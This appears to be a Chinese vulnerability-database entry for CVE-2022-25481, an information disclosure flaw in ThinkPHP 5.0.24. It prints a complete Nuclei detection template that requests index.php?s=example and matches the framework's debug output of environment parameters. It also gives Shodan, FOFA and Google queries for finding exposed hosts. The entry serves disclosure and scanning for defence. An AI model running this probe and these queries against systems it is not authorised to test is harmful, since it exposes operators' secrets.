CVE-2022-25481: ThinkPHP 5.0.24 - Information Disclosure

日期: 2025-08-01 | 影响软件: ThinkPHP | POC: 已公开

漏洞描述

ThinkPHP 5.0.24 is susceptible to information disclosure. This version was configured without the PATHINFO parameter. This can allow an attacker to access all system environment parameters from index.php, thereby possibly obtaining sensitive information, modifying data, and/or executing unauthorized operations.

PoC代码[已公开]

id: CVE-2022-25481

info:
  name: ThinkPHP 5.0.24 - Information Disclosure
  author: caon
  severity: high
  description: |
    ThinkPHP 5.0.24 is susceptible to information disclosure. This version was configured without the PATHINFO parameter. This can allow an attacker to access all system environment parameters from index.php, thereby possibly obtaining sensitive information, modifying data, and/or executing unauthorized operations.
  impact: |
    An attacker can exploit this vulnerability to gain sensitive information.
  remediation: |
    Upgrade to a patched version of ThinkPHP or apply the necessary security patches.
  reference:
    - https://github.com/Lyther/VulnDiscover/blob/master/Web/ThinkPHP_InfoLeak.md
    - https://nvd.nist.gov/vuln/detail/CVE-2022-25481
    - https://github.com/20142995/sectool
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2022-25481
    cwe-id: CWE-668
    epss-score: 0.43981
    epss-percentile: 0.97463
    cpe: cpe:2.3:a:thinkphp:thinkphp:5.0.24:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: thinkphp
    product: thinkphp
    shodan-query:
      - title:"ThinkPHP"
      - http.title:"thinkphp"
      - cpe:"cpe:2.3:a:thinkphp:thinkphp"
    fofa-query:
      - title="thinkphp"
      - header="think_lang"
    google-query: intitle:"thinkphp"
  tags: cve,cve2022,thinkphp,exposure,oss

http:
  - method: GET
    path:
      - '{{BaseURL}}/index.php?s=example'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Exception"
          - "REQUEST_TIME"
          - "ThinkPHP Constants"
        condition: and

      - type: status
        status:
          - 200
          - 500
          - 404
        condition: or
# digest: 4a0a0047304502200aacc0ac5d0bbffab745572eec1dc6ec22835e9af359584b650718eeee8e117a022100c6eedebc48b6a891f256689f3508828de74c83f28af02978c6cca985728b010b:922c64590222798bb761d5b6d8e72950

相关漏洞推荐